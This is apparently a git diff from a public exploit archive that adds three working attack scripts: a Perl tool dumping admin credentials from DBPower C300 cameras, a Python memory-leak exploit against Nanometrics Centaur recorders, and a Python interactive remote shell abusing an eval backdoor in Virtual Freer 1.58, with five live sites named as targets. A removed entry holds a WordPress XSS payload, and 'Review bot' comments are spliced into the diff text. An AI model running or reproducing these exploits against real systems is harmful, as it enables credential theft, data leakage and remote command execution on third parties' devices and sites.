diff --git a/exploits/hardware/webapps/48095.pl b/exploits/hardware/webapps/48095.pl
new file mode 100755
index 000000000..0825ae713
--- /dev/null
+++ b/exploits/hardware/webapps/48095.pl
@@ -0,0 +1,89 @@
+# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure
+# Date: 2020-02-19
+# Author: Todor Donev
+# Vendor: https://donev.eu/
+# CVE: N/A
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+#
+# [ DBPower C300 HD Camera Remote Configuration Disclosure
+# [ ==========================================================
+# [ Exploit Author: Todor Donev 2020
+# [ Initializing the browser
+# [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date =>
+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 25730
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified =>
+# [ << Client-Date =>
+# [ << Client-Peer => 192.168.1.103:8080
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+#
+#!/usr/bin/perl
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n";
+print "[ ==========================================================\n";
+print "[ Exploit Author: Todor Donev 2020 \n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48098.py b/exploits/hardware/webapps/48098.py
new file mode 100755
index 000000000..39b9c2999
--- /dev/null
+++ b/exploits/hardware/webapps/48098.py
@@ -0,0 +1,207 @@
+# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
+# Date: 2020-02-15
+# Author: byteGoblin
+# Vendor: https://www.nanometrics.ca
+# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
+# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
+# CVE: N/A
+#
+# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
+#
+#
+# Vendor: Nanometrics Inc.
+# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
+# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
+#
+# Affected versions:
+# Centaur <= 4.3.23
+# TitanSMA <= 4.2.20
+#
+# Summary:
+# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
+# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
+# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
+# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
+# infrasound and similar geophysical sensor recording applications requiring sample rates up to
+# 5000 sps.
+#
+# Summary:
+# The TitanSMA is a strong motion accelerograph designed for high precision observational and
+# structural engineering applications, where scientists and engineers require exceptional dynamic
+# range over a wide frequency band.
+#
+# Description:
+# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
+# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
+# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
+# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
+# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
+# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
+# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
+# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
+# and authentication bypass scenarios.
+#
+# Tested on:
+# Jetty 9.4.z-SNAPSHOT
+#
+# Vulnerability discovered by:
+# byteGoblin @ zeroscience.mk
+#
+#
+# Advisory ID: ZSL-2020-5562
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
+#
+# Related CVE: CVE-2015-2080
+# Related CWE: CWE-532, CWE-538
+#
+# 10.02.2020
+#
+
+#!/usr/bin/env python3
+
+import requests
+import re
+import sys
+
+class Goblin:
+ def __init__(self):
+ self.host = None
+ self.page = "/zsl"
+ self.syslog = "/logs/syslog"
+ self.buffer_pad = "A" * 70
+ self.buffer = None
+ self.payload = "\xFF"
+ self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
+ self.body = {}
+ self.headers = None
+ self.syslog_data = {}
+ self.last_line = None
+ self.before_last_line = True
+
+ def banner(self):
+ goblin = """
+ NN
+ NkllON
+ 0;;::k000XN KxllokN
+ 0;,:,;;;;:ldK Kdccc::oK
+ Nx,';codddl:::dkdc:c:;lON
+ klc:clloooooooc,.':lc;'lX
+ x;:ooololccllc:,:ll:,:xX
+ Kd:cllc'..';:ccclc,.x _ . ___ _ .
+ NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __
+ Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `.
+ 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |
+ 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / |
+ Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/
+ Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//
+ XxclkXk;'::,,,''';:::;'''...'',:o0
+ Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin
+ O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin zeroscience.mk
+ Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K
+ d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca
+ Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA
+ d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20
+ 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
+ 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A
+ 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
+ :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0
+ x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product
+ Xx:,'':xk:..,''lK Y k;';;';xX
+ XOkkko'.....'O d.';;,,:xN
+ 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._
+ XOkkkkkON
+ """
+ print(goblin)
+
+ def generate_payload(self, amount_of_bytes):
+ self.payload += "\x00" * amount_of_bytes
+ self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}
+
+ def read_syslog(self, initial=False):
+ # Read syslog remotely and filter out 'HeapByteBuffer' messages.
+ # 'initial' is used to make a 'snapshot' of the state before we send payloads...
+ # That way we can filter on what we've just sent.
+ print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
+ buffer = ""
+ r = requests.get(self.host + self.syslog)
+ if r.status_code == 200:
+ print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
+ split = r.text.split("\n")
+ for line in split:
+ if "HeapByteBuffer" in line:
+ if initial:
+ self.last_line = line
+ else:
+ if line == self.last_line:
+ self.before_last_line = False
+ if not self.before_last_line:
+ buffer_addr = re.search("\@\w+", line).group(0).strip("@")
+ try:
+ leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
+ buffer += leak
+ except Exception as e:
+ print(e)
+ if initial:
+ return self.last_line
+ self.buffer = buffer
+ else: # we can't access syslog?
+ print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
+ print("[!!!] - The status code we got was: {}".format(r.status_code))
+ exit(-1)
+
+ def show_output(self):
+ # we need to translate '\r\n' into actual newlines
+ if self.buffer is not None and self.buffer is not "":
+ self.buffer = self.buffer.replace("\\n", "\n")
+ self.buffer = self.buffer.replace("\\r", "\r")
+ self.buffer = self.buffer.replace("%2f", "/")
+
+ print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
+ print("=" * 50)
+ print("[*] THIS IS THE LOOT")
+ print("=" * 50)
+ for num, x in enumerate(self.buffer.split("\n")):
+ print("{}.\t| \t{}".format(num, x))
+
+ def send_payload(self, amount):
+ print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
+ if amount > self.payloads_to_send or amount < 0:
+ amount = self.payloads_to_send
+ for num, x in enumerate(range(0, amount)):
+ if num % 10 == 0:
+ print("[!] - [{}/{}] payloads sent...".format(num, amount))
+ try:
+ self.generate_payload(17)
+ r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
+ except Exception as e:
+ print(e)
+ print("[!] - [{}/{}] payloads sent...".format(amount, amount))
+
+ def parse_sys_args(self):
+ if len(sys.argv) >= 2:
+ self.host = sys.argv[1]
+ if not "http" in self.host:
+ self.host = "http://{}".format(self.host)
+ if len(sys.argv) == 3:
+ # amount of packets to send
+ self.payloads_to_send = sys.argv[2]
+ else:
+ self.print_help()
+
+ def print_help(self):
+ print("Usage: {} [amount of payloads to send]".format(sys.argv[0]))
+ print("Example: centaur3.py 123.456.789.0:8080 200")
+ print("\tThis will send 200 payloads to the aforementioned host")
+ print("\tThe [port] and [amount of payloads] are optional")
+ exit(-1)
+
+ def main(self):
+ self.parse_sys_args()
+ self.banner()
+ ll = self.read_syslog(initial=True)
+ self.send_payload(70)
+ self.read_syslog()
+ self.show_output()
+
+if __name__ == '__main__':
+ Goblin().main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48093.txt b/exploits/php/webapps/48093.txt
deleted file mode 100644
index f934098f0..000000000
--- a/exploits/php/webapps/48093.txt
+++ /dev/null
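Review bot: `show_output` guards with `self.buffer is not ""`, an identity test against a string literal that CPython only warns about and does not guarantee; use `if self.buffer:` (or `!= ""`). In `read_syslog` the patterns `"\@\w+"` and `">>>.+(?=\.\.\.)"` are ordinary strings whose backslash escapes recent interpreters flag as invalid, so write them as raw strings `r"\@\w+"` and `r">>>.+(?=\.\.\.)"`; `buffer_addr` on the first of those lines is assigned and never read, as is `ll` in `main`. The banner prints `Affected versions: <= 4.3.23, <= 4.3.20` while the header block says `TitanSMA <= 4.2.20`, so one of the two is a typo and the affected version should be stated in a single place. `exit(-1)` in `read_syslog` and `print_help` relies on the `site` module's convenience builtin; `sys.exit(1)` is the portable call and `sys` is already imported.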
@@ -1,31 +0,0 @@
-# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
-# Dork:N/A
-# Date: 2020-02-17
-# Exploit Author: UltraSecurityTeam
-# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
-# Vendor Homepage: UltraSec.Org
-# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
-# Tested on: Windows/Linux
-# Version: 1.6.2
-
-
-
-.:: Plugin Description ::.
-An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
-
-
-.:: Proof Of Concept (PoC) ::.
-
-Step 1 - Open WordPress Setting
-Step 2 - Open Wp Sitemap Page
-Step 3 - Inject Your Java Script Codes to Exclude pages
-Step 4 - Click Button Save Changes
-Step 5 - Run Your Payload
-
-
-.:: Tested Payload ::.
-'>">
-
-
-.:: Post Request ::.
-option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes
\ No newline at end of file
diff --git a/exploits/php/webapps/48094.py b/exploits/php/webapps/48094.py
new file mode 100755
index 000000000..8759bbe3b
--- /dev/null
+++ b/exploits/php/webapps/48094.py
@@ -0,0 +1,113 @@
+# Exploit title : Virtual Freer 1.58 - Remote Command Execution
+# Exploit Author : SajjadBnd
+# Date : 2020-02-17
+# Vendor Homepage : http://freer.ir/virtual/
+# Software Link : http://www.freer.ir/virtual/download.php?action=get
+# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
+# Tested on : Ubuntu 19.10
+# Version : 1.58
+############################
+# [ DESCRIPTION ]
+#
+# Free Script For Sell Charging Cards and Virtual Products
+#
+# [POC]
+#
+# Vulnerable file: /include/libs/nusoap.php
+# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
+#
+# POST /include/libs/nusoap.php
+# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
+#
+# [ Sample Vulnerable Sites ]
+#
+# http://3cure.ir/buy/
+# http://cheapcharger.ir/
+# http://www.appraworld.ir/
+# http://latoon.ir/
+# http://novinv.ir/
+#
+
+import requests
+import os
+import sys
+
+def clear():
+ linux = 'clear'
+ windows = 'cls'
+ os.system([linux, windows][os.name == 'nt'])
+
+def Banner():
+ print '''
+#################################################
+# #
+# Virtual Freer 1.58 - Remote Command Execution #
+# SajjadBnd #
+# BiskooitPedar #
+# blackwolf@post.com #
+#################################################
+'''
+
+def inputs():
+ target = raw_input('[*] URL : ')
+ while True:
+ try:
+ r = requests.get(target,verify=False)
+ start(target)
+ except requests.exceptions.MissingSchema:
+ target = "http://" + target
+
+def start(target):
+ print "======================\n\n[!] Checking: ****()"
+ url = '%s/include/libs/nusoap.php' % (target)
+ body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
+ r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+ content = r.text.encode('utf-8')
+ if 'vulnerable' in content:
+ print "[+] vulnerable: ****()\n"
+ else:
+ print "[-] Target not Vulnerable!"
+ sys.exit(1)
+ print "\n[!] Checking: System()"
+ body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
+ r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+ content = r.text.decode('utf-8')
+ if 'gid' in content:
+ print "[+] vulnerable: system()\n"
+ osshell(url)
+ else:
+ print "[-] Target not Vulnerable to Running OS Commands!"
+ evalshell(url)
+
+def osshell(url):
+ print "======================\n[+] You can run os commands :D\n"
+ while True:
+ try:
+ cmd = raw_input('OS_SHELL $ ')
+ command = "system('%s');" % (cmd)
+ body = {'a74ad8dfacd4f985eb3977517615ce25':command}
+ r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+ content = r.text.encode('utf-8')
+ print "\n",content
+ except KeyboardInterrupt:
+ print "\n____________________\n[+] GoodBye :D"
+ sys.exit(1)
+
+def evalshell(url):
+ print "======================\n[+] You can just run Eval Commands :D\n"
+ while True:
+ try:
+ cmd = raw_input('\nEval()=> ')
+ command = '%s;' % (cmd)
+ body = {'a74ad8dfacd4f985eb3977517615ce25':command}
+ r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+ content = r.text.encode('utf-8')
+ print "\n",content
+ except KeyboardInterrupt:
+ print "\n____________________\n[+] ok! GoodBye :D"
+ sys.exit(1)
+
+if __name__ == '__main__':
+ clear()
+ Banner()
+ inputs()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9aee733ee..d85c81a3f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
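Review bot: The header's `[ Sample Vulnerable Sites ]` section lists five live third-party hostnames; a published advisory should not carry a target list and the proof of concept does not depend on it, so the section should be removed. The quoted vulnerable line, `eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);` inside the bundled `nusoap.php` and keyed on a fixed 32-hex-character parameter name, looks more like a planted backdoor than an accidental flaw, and the header should state whether it was observed in the vendor download, only in the `nuller.ir` mirror, or both, since that decides who has to remediate and whether the software supply chain is the real issue. `start` reads the first response with `r.text.encode('utf-8')` and the second with `r.text.decode('utf-8')`; the two are inconsistent, and under Python 2 calling `decode` on the already-unicode `r.text` goes through an implicit ASCII step, so one form should be used throughout. The file is Python 2 (`print '...'`, `raw_input`) but has no shebang and the header does not say so, and `requests.get(target, verify=False)` in `inputs` disables certificate verification without a comment explaining why.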
@@ -42373,4 +42373,6 @@ id,file,description,date,author,type,platform,port
 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
-48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php,
+48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
+48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
+48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,